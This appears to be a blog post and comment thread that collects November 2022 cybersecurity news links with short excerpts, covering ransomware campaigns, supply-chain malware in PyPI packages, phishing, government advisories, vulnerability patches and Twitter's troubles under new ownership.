Cyber security news November 2022

This posting is here to collect cyber security news in November 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

349 Comments

  1. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
    The FBI and CISA say an Iranian-backed threat group hacked a US Federal Civilian Executive Branch and deployed XMRig cryptomining malware via the Log4Shell flaw — The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked …

    US govt: Iranian hackers breached federal agency using Log4Shell exploit
    https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/

    The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.

    The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability.

    After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency’s network.

    Reply
  2. Tomi Engdahl says:

    Chinese Hackers Using 42,000 Imposter Domains in Massive Phishing Attack Campaign https://thehackernews.com/2022/11/chinese-hackers-using-42000-imposter.html
    A China-based financially motivated group is leveraging the trust associated with popular international brands to orchestrate a large-scale phishing campaign dating back as far as 2019. More than
    400 organizations, including Emirates, Shopee, Unilever, Indomie, Coca-Cola, McDonald’s, and Knorr, are being imitated as part of the criminal scheme, the researchers said. Original at https://www.cyjax.com/2022/11/14/fangxiao-a-chinese-threat-actor/

    Reply
  3. Tomi Engdahl says:

    #StopRansomware: Hive Ransomware
    https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
    The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.

    Reply
  4. Tomi Engdahl says:

    A Comprehensive Look at Emotets Fall 2022 Return https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return
    TA542, an actor that distributes Emotet malware, has once again returned from an extensive break from delivering malicious emails. The actor was absent from the landscape for nearly four months, last seen on July 13, 2022 before returning on November 2, 2022. Proofpoint observed multiple changes to Emotet and its payloads including the lures used, and changes to the Emotet modules, loader, and packer.

    Reply
  5. Tomi Engdahl says:

    WASP malware stings Python developers
    https://www.theregister.com/2022/11/16/wasp_python_malware_checkmarx/
    Malware dubbed WASP is using steganography and polymorphism to evade detection, with its malicious Python packages designed to steal credentials, personal information, and cryptocurrency. Original at
    https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192

    Reply
  6. Tomi Engdahl says:

    Disneyland Malware Team: Its a Puny World After All https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/
    A financial cybercrime group calling itself the Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non-Latin alphabets like Cyrillic.

    Reply
  7. Tomi Engdahl says:

    QBot phishing abuses Windows Control Panel EXE to infect devices https://www.bleepingcomputer.com/news/security/qbot-phishing-abuses-windows-control-panel-exe-to-infect-devices/
    Phishing emails distributing the QBot malware are using a DLL hijacking flaw in the Windows 10 Control Panel to infect computers, likely as an attempt to evade detection by security software.

    Reply
  8. Tomi Engdahl says:

    DEV-0569 finds new ways to deliver Royal ransomware, various payloads https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/
    Recent activity from the threat actor that Microsoft tracks as DEV-0569, known to distribute various payloads, has led to the deployment of the Royal ransomware, which first emerged in September
    2022 and is being distributed by multiple threat actors. Observed
    DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation. Also:
    https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/

    Reply
  9. Tomi Engdahl says:

    Google wins lawsuit against alleged Russian botnet herders https://www.theregister.com/2022/11/17/google_botnet_default_judgment/
    According to the court docs, the Glupteba malware instructs the computers it has infected to look for the addresses of its command-and-control servers by “referencing transactions associated with specific accounts on the… blockchain.” Basically, if the botnet’s C2 servers are disabled, its operators can simply set up new servers and broadcast their addresses on the blockchain.

    Reply
  10. Tomi Engdahl says:

    Cyberattacks On U.S. Airport Websites Signal Growing Threat To Critical Infrastructure https://www.forbes.com/sites/emilsayegh/2022/11/16/snakes-on-a-plane-beware-of-airport-cyber-attacks/
    The October outages for Los Angeles International Airport (LAX), Chicago OHare (ORD), and Atlanta Hartsfield-Jackson International appear to be part of ongoing pro-Russian cyberattacks escalation of a recent campaign protesting the U.S. government’s support for Ukraine in its war with Russia.

    Reply
  11. Tomi Engdahl says:

    Hundreds Infected With ‘Wasp’ Stealer in Ongoing Supply Chain Attack
    https://www.securityweek.com/hundreds-infected-wasp-stealer-ongoing-supply-chain-attack

    Security researchers are raising alarm on an ongoing supply chain attack that uses malicious Python packages to distribute an information stealer.

    Ongoing since the first half of October, the attack was uncovered by Phylum on November 1, with the attackers copying existing popular libraries and injecting a malicious ‘import’ statement into them.

    The purpose of the injected code is to infect the victim’s machine with a script that runs in the background. The script, which fetches the victim’s geolocation, contains a modified version of an information stealer called Wasp.

    The attackers have managed to infect hundreds of victims to date, while actively releasing new packages to continue the campaign, Checkmarx notes.

    Phylum Discovers Dozens More PyPI Packages Attempting to Deliver W4SP Stealer in Ongoing Supply-Chain Attack
    https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack

    Last week, our automated risk detection platform alerted us to suspicious activity in dozens of newly published PyPI packages. Here’s what we uncovered.

    Last week, our automated risk detection platform alerted us to some suspicious activity in dozens of newly published PyPI packages. It appears that these packages are a more sophisticated attempt to deliver the W4SP Stealer on to Python developer’s machines by hiding a malicious __import__ . Join us here on the Phylum research team as we investigate these new and shifting tactics the attacker is using to deploy W4SP stealer in this supply-chain attack.

    Reply
  12. Tomi Engdahl says:

    Asiantuntijat tyrmäävät “tulo­kuninkaan” tuoreimmat selitykset: ”Ammattilaiset eivät tee jäyniä” https://www.is.fi/digitoday/tietoturva/art-2000009208880.html

    Reply
  13. Tomi Engdahl says:

    Ticketmaster Cancels Public Sale For Taylor Swift ‘Eras’ Tour Amid Historically High Demand
    https://www.forbes.com/sites/marisadellatto/2022/11/17/ticketmaster-cancels-public-sale-for-taylor-swift-eras-tour-amid-historically-high-demand/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Gordie&sh=1722e3c66cf1

    Ticketmaster said Thursday it was canceling the general admissions sale of tickets for Taylor Swift’s “The Eras” tour, after the site crashed earlier this week during pre-sale events because of “historically unprecedented” demand.

    Reply
  14. Tomi Engdahl says:

    Epäily: Uponoriin tieto­murto ennen kiristystä https://www.is.fi/digitoday/tietoturva/art-2000009210377.html

    KAKSI viikkoa sitten kiristyshaittaohjelmalla tehdyn hyökkäyksen kohteeksi joutunut Uponor kertoo löytäneensä merkkejä tietomurrosta järjestelmiinsä.

    Reply
  15. Tomi Engdahl says:

    Microsoft urges devs to migrate away from .NET Core 3.1 ASAP
    https://www.bleepingcomputer.com/news/security/microsoft-urges-devs-to-migrate-away-from-net-core-31-asap/

    Microsoft has urged developers still using the long-term support (LTS) release of .NET Core 3.1 to migrate to the latest .NET Core versions until it reaches the end of support (EOS) next month.

    The company warned customers on the Windows message center to upgrade to .NET 6 (LTS) or .NET 7 “as soon as possible” before .NET Core 3.1 (LTS) reaches EOS on December 13, 2022.

    Reply
  16. Tomi Engdahl says:

    Will #infosecTwitter survive Elon Musk?
    https://www.cyberscoop.com/twitter-dumpster-fire-infosectwitter/

    For years infosec Twitter has been a robust community, with all the ups and downs, quality and dreck, you’d find in any online space. Many have moved over to Mastadon, which offers a Twitter-like experience with notable differences by design.

    “That’s where infosec is now,” Patrick Gray, the host of the Risky Business podcast, said on his show Wednesday. “It’s absolutely insane how quickly it happened.”

    But some worry that the fracturing of infosec Twitter could have profound impacts on not only the community, but the vital exchange about the latest vulnerabilities, researchers’ techniques and tactics and the newest hacks that have collectively helped make the internet more secure — and the people on the frontlines of cybersecurity more informed.

    The platform became a replacement for the often private and exclusive channels that security researchers previously relied on share information.

    Reply
  17. Tomi Engdahl says:

    Last night, it became apparent that Twitter’s automated copyright strike/takedown system was no longer functional.

    Twitter’s Broken Its Copyright Strike System, Users Are Uploading Full Movies
    https://www.forbes.com/sites/paultassi/2022/11/20/twitters-broken-its-copyright-strike-system-users-are-uploading-full-movies/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Valerie&sh=cd7a4f97d3a8

    While Twitter, the website, remains online and has not simply collapsed after the vast majority of workers were fired or resigned under Elon Musk, we are already starting to see the cracks spreading through the walls.

    Last night, it became apparent that Twitter’s automated copyright strike/takedown system was no longer functional. A user went viral for uploading the entirety of The Fast and the Furious Tokyo Drift in two minute chunks over a 50 tweet thread. While it’s offline this morning, here’s where things get weirder still:

    The media itself was never taken down. Usually, you used to see a “this media cannot be displayed” message when a takedown happens. The tweet and account will be up, but the media is stripped. In this case, it appears someone at Twitter had to manually suspend the entire account.

    And as evidence of a further bug, right now, on mobile, I can still see the tweets from the suspended account. As in, the movie is literally playing in a tweet I am watching on my phone right now, some lingering artifact of account suspension. I can’t see it on desktop, but the tweets I favorited last night to write this article this morning are still actively viewable.

    And again, fundamentally the copyright system does seem broken. Yes, this specific account was suspended, but only because it went viral and was spotted by someone working there, I think. A separate user has uploaded another full movie, 1995’s Hackers, two minutes at a time in a similar thread, and that remains online at the time of this writing

    It should be fairly obvious to anyone what kind of liability it opens Twitter up to if their copyright system is non-functional, and its newly limited pool of workers are going to need to manually hunt down infringers. Once media companies get wind of this, we could see Twitter hit with all sort of DMCA claims and potential legal issues if they can’t get a handle on this quickly. I’m picturing Disney content starting to be uploaded here and them going nuclear.

    Also, it should be noted that one of Elon Musk’s big ideas for Twitter Blue is to allow users to upload long, 40+ minute videos. That would be a nightmare if they can’t fix their copyright enforcement system

    Reply
  18. Tomi Engdahl says:

    Hackers show porn on Brisbane billboard for three minutes
    https://www.smh.com.au/national/queensland/hackers-show-porn-on-brisbane-billboard-for-three-minutes-20221121-p5bzyc.html?utm_medium=Social&utm_source=Facebook#Echobox=1668997468

    Pornography has been shown for up to three minutes after hackers cracked a large electronic roadside billboard along one of Brisbane’s busiest roads.

    The billboard company provided police with images of people who “may be able to help with their inquiries” after the cyberattack on Sunday.

    Reply
  19. Tomi Engdahl says:

    Earth Preta Spear-Phishing Governments Worldwide https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
    We have been monitoring a wave of spear-phishing attacks targeting the government, academic, foundations, and research sectors around the world. Based on the lure documents we observed in the wild, this is a large-scale cyberespionage campaign that began around March. After months of tracking, the seemingly wide outbreak of targeted attacks includes but not limited to Myanmar, Australia, the Philippines, Japan and Taiwan. We analyzed the malware families used in this campaign and attributed the incidents to a notorious advanced persistent threat
    (APT) group called Earth Preta (also known as Mustang Panda and Bronze President).

    Reply
  20. Tomi Engdahl says:

    Previously unidentified ARCrypter ransomware expands worldwide https://www.bleepingcomputer.com/news/security/previously-unidentified-arcrypter-ransomware-expands-worldwide/
    A previously unknown ARCrypter ransomware that compromised key organizations in Latin America is now expanding its attacks worldwide.
    Threat actors behind the new ransomware family attacked a government agency in Chile last August, targeting both Linux and Windows systems and appending the .crypt extension on encrypted files.

    Reply
  21. Tomi Engdahl says:

    Microsoft fixes Windows Kerberos auth issues in emergency updates https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-kerberos-auth-issues-in-emergency-updates/
    Microsoft has released optional out-of-band (OOB) updates to fix a known issue triggering Kerberos sign-in failures and other authentication problems on enterprise Windows domain controllers after installing cumulative updates released during November’s Patch Tuesday.

    Reply
  22. Tomi Engdahl says:

    Researchers Quietly Cracked Zeppelin Ransomware Keys https://krebsonsecurity.com/2022/11/researchers-quietly-cracked-zeppelin-ransomware-keys/
    Peter, who spoke candidly about the attack on condition of anonymity, said the FBI told him to contact a cybersecurity consulting firm in New Jersey called Unit 221B, and specifically its founder Lance James. Zeppelin sprang onto the crimeware scene in December 2019, but it wasnt long before James discovered multiple vulnerabilities in the malwares encryption routines that allowed him to brute-force the decryption keys in a matter of hours, using nearly 100 cloud computer servers.

    Reply
  23. Tomi Engdahl says:

    Merkkejä tietomurrosta Uponoriin kohdistuneen kiristysohjelmahyökkäyksen jäljiltä yhtiö on edistynyt toimintojensa palauttamisessa ennalleen https://www.uponorgroup.com/fi-fi/sijoittajauutiset/2022/merkkeja-tietomurrosta-uponoriin-kohdistuneen-kiristysohjelmahyokkayksen-jaljilta-yhtio-on-edistynyt-toimintojensa-palauttamisessa-ennalleen
    Uponor on havainnut tutkimuksissa merkkejä tietomurrosta, joka koskee Uponorin työntekijöiden, asiakkaiden ja muiden kumppaneiden tietoja.
    Uponorin tämänhetkisten tietojen mukaan tietomurron kohteeksi joutuneita tietoja ei ole päätynyt julkisuuteen.

    Reply
  24. Tomi Engdahl says:

    Chinese hackers use Google Drive to drop malware on govt networks https://www.bleepingcomputer.com/news/security/chinese-hackers-use-google-drive-to-drop-malware-on-govt-networks/
    The attacks have been observed between March and October 2022 and researchers attributed it to the cyber espionage group Mustang Panda (Bronze President, TA416).

    Reply
  25. Tomi Engdahl says:

    Exploit released for actively abused ProxyNotShell Exchange bug https://www.bleepingcomputer.com/news/security/exploit-released-for-actively-abused-proxynotshell-exchange-bug/
    Proof-of-concept exploit code has been released online for two actively exploited and high-severity vulnerabilities in Microsoft Exchange, collectively known as ProxyNotShell.

    Reply
  26. Tomi Engdahl says:

    Transportation sector targeted by both ransomware and APTs https://www.helpnetsecurity.com/2022/11/18/cybersecurity-trends-q3-2022/
    US ransomware activity leads the pack: In the US alone, ransomware activity increased 100% quarter over quarter in transportation and shipping. Globally, transportation was the second most active sector (following telecom). APTs were also detected in transportation more than in any other sector.

    Reply
  27. Tomi Engdahl says:

    An AI Based Solution to Detecting the DoubleZero .NET Wiper https://unit42.paloaltonetworks.com/doublezero-net-wiper/
    Unit 42 researchers introduce a machine learning model that predicts the maliciousness of .NET samples based on specific structures in the file, by analyzing a .NET wiper named DoubleZero. We identify the challenges of detecting this threat through PE structural analysis and conclude by examining the cues picked up by the machine learning model to detect this sample.

    Reply
  28. Tomi Engdahl says:

    Email Cyberattacks on Arab Countries Rise in Lead to Global Football Tournament https://www.trellix.com/en-us/about/newsroom/stories/research/email-cyberattacks-on-arab-countries-rise.html
    Global eyes are soon to be turned to the first global football tournament to be held in the Arab world kicking off on November 20, but malicious actors have already kicked off are World Cup-themed cyberattacks. Email security researchers from the Trellix Advanced Research Center have found attackers to be leveraging FIFA and football-based campaigns to target organizations in Arab countries. It is a common practice for attackers to utilize the important/popular events as a part of the social engineering tactics and particularly target the organizations which are related to event and more promising victim for the attack. Trellix Advanced Research Center researchers caught various emails utilizing the football tournament as an initial attack vector. The following are cases of samples found in the wild:

    Reply
  29. Tomi Engdahl says:

    Google Search results poisoned with torrent sites via Data Studio https://www.bleepingcomputer.com/news/security/google-search-results-poisoned-with-torrent-sites-via-data-studio/
    Introduced in 2016 by Google, Looker Studio (formerly, Google Data
    Studio) is a web-based business intelligence tool that enables users to transform data into customizable informative reports and dashboard for easy visualization and analysis.

    Reply
  30. Tomi Engdahl says:

    iOS 16.2Why You Should Apply The Next iPhone Software Straight Away https://www.forbes.com/sites/kateoflahertyuk/2022/11/19/ios-162-why-you-should-apply-the-next-iphone-software-straight-away/
    But interestingly, Apple iOS 16.2 could see a new feature called Rapid Security Response in action, which is a way for Apple to apply security updates to your phone on the fly. It was first announced with iOS 16 at Apples Fall event, but not made immediately available. This could be about to change, as the iPhone maker has just tested Rapid Security Response in the iOS 16.2 beta.

    Reply
  31. Tomi Engdahl says:

    Omron PLC Vulnerability Exploited by Sophisticated ICS Malware
    https://www.securityweek.com/omron-plc-vulnerability-exploited-sophisticated-ics-malware

    A critical vulnerability has not received the attention it deserves

    A critical vulnerability affecting Omron products has been exploited by a sophisticated piece of malware designed to target industrial control systems (ICS), but it has not received the attention it deserves.

    On November 10, the US Cybersecurity and Infrastructure Security Agency (CISA) published two advisories describing three vulnerabilities affecting NJ and NX-series controllers and software made by Japanese electronics giant Omron.

    One of the advisories describes CVE-2022-33971, a high-severity flaw that can allow an attacker who can access the targeted Omron programmable logic controller (PLC) to cause a denial-of-service (DoS) condition or execute malicious programs.

    Omron PLC vulnerability exploited by ICS malwareThe second advisory describes CVE-2022-34151, a critical hardcoded credentials vulnerability that can be used to access Omron PLCs, and CVE-2022-33208, a high-severity issue that can be used to obtain sensitive information that could allow hackers to bypass authentication and access the controller.

    ICS Advisory (ICSA-22-314-07)
    Omron NJ/NX-series Machine Automation Controllers
    https://www.cisa.gov/uscert/ics/advisories/icsa-22-314-07

    ICS Advisory (ICSA-22-314-08 )
    Omron NJ/NX-series Machine Automation Controllers
    https://www.cisa.gov/uscert/ics/advisories/icsa-22-314-08

    Reply
  32. Tomi Engdahl says:

    https://www.securityweek.com/ukrainian-hacker-sought-us-arrested-switzerland-report

    A Ukrainian hacker sought by US authorities for a decade was arrested last month in Switzerland, the specialist website Krebs on Security reported.

    Reply
  33. Tomi Engdahl says:

    Microsoft Warns of Cybercrime Group Delivering Royal Ransomware, Other Malware
    https://www.securityweek.com/microsoft-warns-cybercrime-group-delivering-royal-ransomware-other-malware

    A threat actor tracked as DEV-0569 and known for the distribution of various malicious payloads was recently observed updating its delivery methods, Microsoft warns.

    DEV-0569 has been relying on malicious ads (malvertising), blog comments, fake forum pages, and phishing links for the distribution of malware.

    Over the past few months, however, Microsoft noticed that the threat actor has started using contact forms to deliver phishing links, while choosing to host fake installers on legitimate-looking software download sites and legitimate repositories, such as GitHub and OneDrive.

    The adversary continues to rely on malvertising for malware distribution, and even expanded the technique by employing Google Ads in one of the campaigns.

    “These methods allow the group to potentially reach more targets and ultimately achieve their goal of deploying various post-compromise payloads,” Microsoft says.

    The group is also known for signing malicious binaries with legitimate certificates, and for using encrypted malware payloads and defense evasion techniques. In recent attacks, DEV-0569 has used the open-source tool Nsudo for disabling antivirus solutions.

    DEV-0569 finds new ways to deliver Royal ransomware, various payloads
    https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

    Reply
  34. Tomi Engdahl says:

    Hive Ransomware Gang Hits 1,300 Businesses, Makes $100 Million
    https://www.securityweek.com/hive-ransomware-gang-hits-1300-businesses-makes-100-million

    The Hive ransomware gang has victimized more than 1,300 businesses, receiving over $100 million in ransom payments over the past year and a half, US government agencies say.

    Active since June 2021 and offered as ransomware-as-a-service (RaaS), Hive has been used in attacks against businesses and critical infrastructure entities, including communications, government, healthcare, IT, and critical manufacturing organizations.

    In an effort to increase awareness of Hive ransomware, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have released a joint alert detailing observed indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs).

    Reply
  35. Tomi Engdahl says:

    Samba Patches Vulnerability That Can Lead to DoS, Remote Code Execution
    https://www.securityweek.com/samba-patches-vulnerability-can-lead-dos-remote-code-execution

    Samba this week released patches for an integer overflow vulnerability that could potentially lead to arbitrary code execution.

    An open source Server Message Block (SMB) implementation for Linux and Unix systems, Samba can be used as an Active Directory Domain Controller (AD DC).

    Tracked as CVE-2022-42898 and impacting multiple Samba releases, the newly addressed security defect exists in the Service for User to Proxy (S4U2proxy) handler, which provides “a service that obtains a service ticket to another service on behalf of a user.”

    Also referred to as ‘constrained delegation’, the feature relies on request and response messages from the Kerberos ticket-granting service (TGS) exchange. Heimdal and MIT Kerberos libraries in Samba ensure Kerberos support and implement the Key Distribution Center (KDC).

    The affected libraries provide an authentication mechanism by means of tickets that can contain Privilege Attribute Certificates (PACs). The bug can be triggered by sending a specially crafted request to the KDC server.

    https://www.samba.org/samba/history/security.html
    https://mailman.mit.edu/pipermail/kerberos-announce/2022q4/000202.html

    Reply
  36. Tomi Engdahl says:

    This Week In Security: Mastodon, Fake Software Company, And ShuffleCake
    https://hackaday.com/2022/11/18/this-week-in-security-mastadon-fake-software-company-and-shufflecake/

    Due to Twitter’s new policy of testing new features on production, the interest in Mastodon as a potential replacement has skyrocketed. And what’s not to love? You can host it yourself, it’s part of the Fediverse, and you can even run one of the experimental forks for more features. But there’s also the danger of putting a service on the internet, as [Gareth Heyes] illustrates by stealing passwords from, ironically, the infosec.exchange instance.

    Stealing passwords from infosec Mastodon – without bypassing CSP
    https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp

    Everybody on our Twitter feed seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about. After figuring out why exactly you had to have loads of @ symbols in your username, I began to have a look at how secure it was. If you’ve followed me on Twitter you’ll know I like to post vectors and test the limits of the app I’m using, and today was no exception.

    First, I began testing to see if HTML or Markdown was supported. I did a couple of “tweets” to see if you could have code blocks (how cool would that be?) but nothing seemed to work. That is, until @ret2bed pointed out that you could change your preferences to enable HTML! That’s right people, a social network that enables you to post HTML – what could possibly go wrong?

    Reply
  37. Tomi Engdahl says:

    Making Cobalt Strike harder for threat actors to abuse https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse
    We are releasing to the community a set of open-source YARA Rules and their integration as a VirusTotal Collection to help the community flag and identify Cobalt Strikes components and its respective versions. Since many threat actors rely on cracked versions of Cobalt Strike to advance their cyberattacks, we hope that by disrupting its use we can help protect organizations, their employees, and their customers around the globe.

    Reply
  38. Tomi Engdahl says:

    Russian 0day thirst traps
    https://grugq.substack.com/p/russian-0day-thirst-traps
    A Russian 0day company has raised their prices for Signal exploits to well above competitor Zerodium. What might this indicate? … Here is the assessment: Russia is desperate for Android and Signal exploits.
    For good reason: (1) Android has an almost 80% market share in Ukraine, and (2) Signal has over 2 million daily active users.

    Reply
  39. Tomi Engdahl says:

    Kyberhyökkäys pysäytti suomalaisen pörssiyhtiön koko tuotannon Nyt tuli tulosvaroitus
    https://www.talouselama.fi/uutiset/kyberhyokkays-pysaytti-suomalaisen-porssiyhtion-koko-tuotannon-nyt-tuli-tulosvaroitus/a39293f2-bf17-4ac4-88f2-373da0041010
    Uponor joutui marraskuun alussa kiristysohjelman uhriksi, joka ajoi sen varotoimenpiteenä tuotantoseisokkiin. Yhtiö poistaa vuoden 2022 ohjeistuksensa, koska menetetyn myynnin kattaminen tämän vuoden puolella ei ole varmaa.

    Reply
  40. Tomi Engdahl says:

    Google Chrome extension used to steal cryptocurrency, passwords https://www.bleepingcomputer.com/news/security/google-chrome-extension-used-to-steal-cryptocurrency-passwords/
    An information-stealing Google Chrome browser extension named ‘VenomSoftX’ is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web. This Chrome extension is being installed by the ViperSoftX Windows malware, which acts as a JavaScript-based RAT (remote access trojan) and cryptocurrency hijacker.

    Reply
  41. Tomi Engdahl says:

    Ticketmaster blames bot attacks for Taylor Swift ticket fiasco https://therecord.media/ticketmaster-blames-bot-attacks-for-taylor-swift-ticket-fiasco/
    The proliferation of affordable bots-as-a-service tools has made it even more difficult for buyers of tickets and products like sneakers or Playstation 5s. Bots now beat out everyday people thanks to powerful technology made readily available by sites like Cybersole, Kodai, GaneshBot and more. Those using bots then resell the goods for a hefty profit.

    Reply
  42. Tomi Engdahl says:

    Threat Assessment: Luna Moth Callback Phishing Campaign https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/
    Unit 42 investigated several incidents related to the Luna Moth/Silent Ransom Group callback phishing extortion campaign targeting businesses in multiple sectors including legal and retail. This campaign leverages extortion without encryption, has cost victims hundreds of thousands of dollars and is expanding in scope.

    Reply
  43. Tomi Engdahl says:

    Apps with over 3 million installs leak ‘Admin’ search API keys https://www.bleepingcomputer.com/news/security/apps-with-over-3-million-installs-leak-admin-search-api-keys/
    Researchers discovered 1,550 mobile apps leaking Algolia API keys, risking the exposure of sensitive internal services and stored user information. … The Algolia API (Application Program Interface) is a proprietary platform for integrating search engines with discovery and recommendation features in websites and applications used by over
    11,000 companies.

    Reply
  44. Tomi Engdahl says:

    The website of Eesti Energia was hit by pro-Kremlin cyber attackers https://www.err.ee/1608794227/eesti-energia-kodulehti-tabas-kremli-meelsete-kuberrunnak
    According to the State Information System Board, the attack by pro-Kremlin criminals simultaneously hit companies and institutions in Latvia, Poland and Ukraine. … “We are closely monitoring what is happening and we are checking that nothing more serious is being attempted in light of the ongoing technologically simple attacks. So far, there have been no other incidents, and only websites and certain services have been disrupted due to the attacks,” [CERT-EE Tõnu Tammer] added.

    Reply
  45. Tomi Engdahl says:

    Get a Loda This: LodaRAT meets new friends https://blog.talosintelligence.com/get-a-loda-this/
    Loda appears to have garnered attention from various threat actors. In a handful of the instances we identified, Loda was deployed alongsideor dropped byother malware. These include RedLine, Neshta and a previously undocumented VenomRAT variant named S500.

    Reply

Leave a Reply to Tomi Engdahl Cancel reply

Your email address will not be published. Required fields are marked *

*

*